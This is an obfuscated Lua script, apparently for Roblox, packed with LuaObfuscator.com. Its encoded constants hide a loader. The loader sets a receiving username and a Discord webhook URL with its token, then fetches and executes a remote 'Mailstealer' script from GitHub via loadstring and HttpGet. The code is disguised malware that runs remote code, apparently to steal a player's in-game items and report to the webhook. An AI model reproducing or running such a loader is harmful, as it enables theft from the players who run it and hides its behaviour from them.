--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.4) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==2) then function v22() local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23() local v32,v33=v1(v16,v19,v19 + 2 );v19=v19 + (5 -3) ;return (v33 * (732 -476)) + v32 ;end v18=3;end if (v18==4) then function v25() local v34=v24();local v35=v24();local v36=1 -0 ;local v37=(v21(v35,2 -(3 -2) ,639 -(555 + (244 -(67 + 113))) ) * (((685 + 248) -(857 + 74))^(600 -(367 + 201)))) + v34 ;local v38=v21(v35,948 -(214 + 713) ,8 + 23 );local v39=((v21(v35,6 + (69 -43) )==1) and  -(878 -(282 + 595))) or (1638 -(1523 + (206 -92))) ;if (v38==(0 + 0)) then if (v37==0) then return v39 * (0 -0) ;else local v76=1065 -(68 + 726 + 271) ;while true do if ((1270 -(226 + 1044))==v76) then v38=4 -3 ;v36=(286 -169) -(32 + 85) ;break;end end end elseif (v38==(2007 + 40)) then return ((v37==(0 + 0)) and (v39 * (((1955 -(915 + 82)) -(892 + (184 -119)))/(0 -0)))) or (v39 * NaN) ;end return v8(v39,v38-(1890 -867) ) * (v36 + (v37/((3 -1)^((296 + 106) -(87 + 263))))) ;end v26=nil;function v26(v40) local v41;if  not v40 then v40=v24();if (v40==(0 + 0)) then return "";end end v41=v3(v16,v19,(v19 + v40) -(1 -0) );v19=v19 + v40 ;local v42={};for v67=1188 -(1069 + 118) , #v41 do v42[v67]=v2(v1(v3(v41,v67,v67)));end return v6(v42);end v18=5;end if (v18==6) then v29=nil;function v29() local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v43==4) then while true do if (v44==0) then local v94=0 -0 ;local v95;while true do if (v94~=(1784 -(599 + 1185))) then else v95=0;while true do if (v95==1) then v44=1;break;end if (v95~=(0 + 0)) then else v45=0 + 0 ;v46=nil;v95=1;end end break;end end end if (v44~=(575 -(507 + 67))) then else v47=nil;v48=nil;v44=1751 -(1013 + 736) ;end if ((2 + 0)~=v44) then else local v96=0;while true do if (v96==1) then v44=3;break;end if (v96==0) then v49=nil;v50=nil;v96=1;end end end if (v44==3) then v51=nil;while true do local v97=0;local v98;while true do if (v97==0) then v98=0;while true do if (v98~=1) then else if ((7 -4)==v45) then local v127=0 -0 ;local v128;local v129;while true do if (v127==(867 -(550 + 317))) then v128=0;v129=nil;v127=1;end if (v127==1) then while true do if (v128~=(0 -0)) then else v129=0 -0 ;while true do if (v129~=0) then else local v164=0 -0 ;local v165;while true do if (v164~=0) then else v165=285 -(134 + 151) ;while true do if (0==v165) then for v174=1666 -(970 + 695) ,v24() do v47[v174-(1 -0) ]=v29();end return v49;end end break;end end end end break;end end break;end end end if (v45==0) then local v130=1990 -(582 + 1408) ;local v131;while true do if ((0 -0)~=v130) then else v131=0;while true do if (v131~=(0 -0)) then else v46={};v47={};v131=3 -2 ;end if (v131~=(1825 -(1195 + 629))) then else v48={};v45=1;break;end end break;end end end break;end if ((0 -0)==v98) then if (v45~=(242 -(187 + 54))) then else local v132=780 -(162 + 618) ;local v133;while true do if (v132~=0) then else v133=0 + 0 ;while true do if (1==v133) then v51={};v45=2 + 0 ;break;end if (v133==(0 -0)) then v49={v46,v47,nil,v48};v50=v24();v133=1;end end break;end end end if (v45~=(1 + 1)) then else local v134=0;local v135;local v136;while true do if ((1637 -(1373 + 263))==v134) then while true do if ((1000 -(451 + 549))==v135) then v136=0 + 0 ;while true do if (v136~=(0 -0)) then else local v166=0 -0 ;while true do if (v166==1) then v136=1;break;end if (v166==(1384 -(746 + 638))) then local v172=0 + 0 ;while true do if (1==v172) then v166=1;break;end if (v172~=0) then else for v176=1 -0 ,v50 do local v177=341 -(218 + 123) ;local v178;local v179;local v180;while true do if (v177==(1581 -(1535 + 46))) then local v182=0 + 0 ;while true do if ((1 + 0)==v182) then v177=561 -(306 + 254) ;break;end if (v182==(0 + 0)) then v178=0 -0 ;v179=nil;v182=1;end end end if (v177~=(1468 -(899 + 568))) then else v180=nil;while true do if (v178==(0 + 0)) then local v188=0;local v189;local v190;while true do if (v188~=0) then else v189=0;v190=nil;v188=1;end if (1~=v188) then else while true do if (v189~=0) then else v190=0;while true do if (v190==(2 -1)) then v178=604 -(268 + 335) ;break;end if (v190==(290 -(60 + 230))) then local v201=0;local v202;while true do if (v201~=0) then else v202=572 -(426 + 146) ;while true do if (v202==(1 + 0)) then v190=1;break;end if (v202~=(1456 -(282 + 1174))) then else v179=v22();v180=nil;v202=812 -(569 + 242) ;end end break;end end end end break;end end break;end end end if (v178~=1) then else if (v179==1) then v180=v22()~=(0 -0) ;elseif (v179==(1 + 1)) then v180=v25();elseif (v179==(1027 -(706 + 318))) then v180=v26();end v51[v176]=v180;break;end end break;end end end v49[1254 -(721 + 530) ]=v22();v172=1272 -(945 + 326) ;end end end end end if (v136~=(2 -1)) then else for v167=1 + 0 ,v24() do local v168=0;local v169;local v170;local v171;while true do if (v168~=0) then else v169=700 -(271 + 429) ;v170=nil;v168=1;end if (v168~=1) then else v171=nil;while true do if (v169~=(1 + 0)) then else while true do if (v170~=0) then else v171=v22();if (v21(v171,1,1501 -(1408 + 92) )==(1086 -(461 + 625))) then local v183=1288 -(993 + 295) ;local v184;local v185;local v186;local v187;while true do if (v183~=(1 + 0)) then else v186=nil;v187=nil;v183=2;end if (v183~=2) then else while true do if (v184~=0) then else local v192=1171 -(418 + 753) ;local v193;while true do if (v192~=0) then else v193=0 + 0 ;while true do if (v193==0) then local v204=0;while true do if (v204==(0 + 0)) then v185=v21(v171,2,1 + 2 );v186=v21(v171,2 + 2 ,6);v204=1;end if (v204~=(530 -(406 + 123))) then else v193=1770 -(1749 + 20) ;break;end end end if (1~=v193) then else v184=1 + 0 ;break;end end break;end end end if (v184==(1325 -(1249 + 73))) then if (v21(v186,2 + 1 ,1148 -(466 + 679) )==(2 -1)) then v187[4]=v51[v187[11 -7 ]];end v46[v167]=v187;break;end if (v184~=(1902 -(106 + 1794))) then else local v195=0 + 0 ;local v196;while true do if (v195==(0 + 0)) then v196=0;while true do if (v196==1) then v184=8 -5 ;break;end if (v196==0) then if (v21(v186,2 -1 ,115 -(4 + 110) )~=(585 -(57 + 527))) then else v187[1429 -(41 + 1386) ]=v51[v187[105 -(17 + 86) ]];end if (v21(v186,2 + 0 ,3 -1 )==1) then v187[8 -5 ]=v51[v187[169 -(122 + 44) ]];end v196=1;end end break;end end end if (v184==1) then v187={v23(),v23(),nil,nil};if (v185==(0 + 0)) then local v199=0 + 0 ;local v200;while true do if (v199==(0 -0)) then v200=65 -(30 + 35) ;while true do if (v200~=(0 + 0)) then else v187[1260 -(1043 + 214) ]=v23();v187[15 -11 ]=v23();break;end end break;end end elseif (v185==(1213 -(323 + 889))) then v187[3]=v24();elseif (v185==2) then v187[3]=v24() -((5 -3)^(596 -(361 + 219))) ;elseif (v185~=(323 -(53 + 267))) then else local v212=0;local v213;local v214;local v215;while true do if (v212~=1) then else v215=nil;while true do if (v213==0) then v214=0;v215=nil;v213=1 + 0 ;end if (v213~=(414 -(15 + 398))) then else while true do if (v214~=(982 -(18 + 964))) then else v215=0 -0 ;while true do if (v215~=0) then else v187[2 + 1 ]=v24() -((2 + 0)^(866 -(20 + 830))) ;v187[4 + 0 ]=v23();break;end end break;end end break;end end break;end if (v212==(126 -(116 + 10))) then v213=0;v214=nil;v212=1 + 0 ;end end end v184=2;end end break;end if (v183==0) then v184=0;v185=nil;v183=1;end end end break;end end break;end if (v169~=(738 -(542 + 196))) then else local v181=0 -0 ;while true do if (v181==(0 + 0)) then v170=0;v171=nil;v181=1 + 0 ;end if (v181==1) then v169=1 + 0 ;break;end end end end break;end end end v45=7 -4 ;break;end end break;end end break;end if (v134~=0) then else v135=0;v136=nil;v134=2 -1 ;end end end v98=1552 -(1126 + 425) ;end end break;end end end break;end end break;end if (v43==(406 -(118 + 287))) then v46=nil;v47=nil;v43=2;end if ((11 -8)==v43) then v50=nil;v51=nil;v43=1125 -(118 + 1003) ;end if (v43==0) then v44=0 -0 ;v45=nil;v43=378 -(142 + 235) ;end if (v43~=2) then else v48=nil;v49=nil;v43=3;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v52) if (v1(v52,2)==79) then v20=v0(v3(v52,1,1));return "";else local v69=0;local v70;while true do if (v69==0) then v70=v2(v0(v52,16));if v20 then local v99=0;local v100;while true do if (v99==1) then return v100;end if (v99==0) then v100=v5(v70,v20);v20=nil;v99=1;end end else return v70;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24() local v53,v54,v55,v56=v1(v16,v19,v19 + (13 -10) );v19=v19 + 1 + 0 + 3 ;return (v56 * ((9769195 + 7008998) -(553 + 424))) + (v55 * (123925 -58389)) + (v54 * (226 + 30)) + v53 ;end v25=nil;v18=4;end if (v18==7) then function v30(v57,v58,v59) local v60=0;local v61;local v62;local v63;while true do if (v60==1) then v63=v57[3];return function(...) local v77=v61;local v78=v62;local v79=v63;local v80=v28;local v81=1;local v82= -1;local v83={};local v84={...};local v85=v12("#",...) -1 ;local v86={};local v87={};for v91=0,v85 do if (v91>=v79) then v83[v91-v79 ]=v84[v91 + 1 ];else v87[v91]=v84[v91 + 1 ];end end local v88=(v85-v79) + 1 ;local v89;local v90;while true do v89=v77[v81];v90=v89[1];if (v90<=10) then if (v90<=4) then if (v90<=1) then if (v90==0) then v81=v89[3];else v87[v89[2]]=v59[v89[3]];end elseif (v90<=2) then local v108=v89[2];local v109=v87[v89[3]];v87[v108 + 1 ]=v109;v87[v108]=v109[v89[4]];elseif (v90==3) then v87[v89[2]]=v89[3]~=0 ;else v87[v89[2]]=v89[3];end elseif (v90<=7) then if (v90<=5) then local v113=v89[2];v87[v113]=v87[v113](v13(v87,v113 + 1 ,v82));elseif (v90==6) then v87[v89[2]]=v89[3];else do return;end end elseif (v90<=8) then v87[v89[2]]=v59[v89[3]];elseif (v90>9) then do return;end else local v142=v89[2];v87[v142]=v87[v142](v13(v87,v142 + 1 ,v82));end elseif (v90<=15) then if (v90<=12) then if (v90>11) then if (v87[v89[2]]==v89[4]) then v81=v81 + 1 ;else v81=v89[3];end else local v117=v89[2];local v118,v119=v80(v87[v117](v13(v87,v117 + 1 ,v89[3])));v82=(v119 + v117) -1 ;local v120=0;for v124=v117,v82 do v120=v120 + 1 ;v87[v124]=v118[v120];end end elseif (v90<=13) then v59[v89[3]]=v87[v89[2]];elseif (v90==14) then v87[v89[2]]=v89[3]~=0 ;else local v146=v89[2];local v147,v148=v80(v87[v146](v13(v87,v146 + 1 ,v89[3])));v82=(v148 + v146) -1 ;local v149=0;for v156=v146,v82 do v149=v149 + 1 ;v87[v156]=v147[v149];end end elseif (v90<=18) then if (v90<=16) then if (v87[v89[2]]==v89[4]) then v81=v81 + 1 ;else v81=v89[3];end elseif (v90==17) then v87[v89[2]]();else v59[v89[3]]=v87[v89[2]];end elseif (v90<=19) then v81=v89[3];elseif (v90==20) then v87[v89[2]]();else local v153=0;local v154;local v155;while true do if (v153==0) then v154=v89[2];v155=v87[v89[3]];v153=1;end if (v153==1) then v87[v154 + 1 ]=v155;v87[v154]=v155[v89[4]];break;end end end v81=v81 + 1 ;end end;end if (v60==0) then v61=v57[1];v62=v57[2];v60=1;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v64,v65,v66) if v66 then local v71=(v64/((1 + 1)^(v65-(1 + 0))))%(2^(((v66-(1 + 0)) -(v65-(2 -1))) + (2 -1))) ;return v71-(v71%1) ;else local v72=(4 -2)^(v65-(1 + 0)) ;return (((v64%(v72 + v72))>=v72) and ((1333 -(797 + 532)) -3)) or (753 -(239 + 374 + 140)) ;end end v22=nil;v18=2;end end end return v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030A3O0072616E69656C5F6A7564030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403483O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F436F64696E674E696E6A61582F5363726970742F6D61696E2F4D61696C737465616C6572617703083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31322O333634373837353238343739353437332F56525A4D59794C546946495A2D6A5A574C63514C766F6E4F395A6769796D543456627A756F7273526575336E3537737055733034744D67596E48467369437A572O6F683200173O0012043O00013O00260C3O000E000100020004133O000E0001001204000100043O002O12000100033O001201000100053O001201000200063O002015000200020007001204000400084O0003000500014O000F000200054O000500013O00022O00110001000100010004133O0016000100260C3O0001000100010004133O00010001001204000100043O002O12000100093O0012040001000B3O002O120001000A3O0012043O00023O0004133O000100012O00073O00017O00",v9(),...);
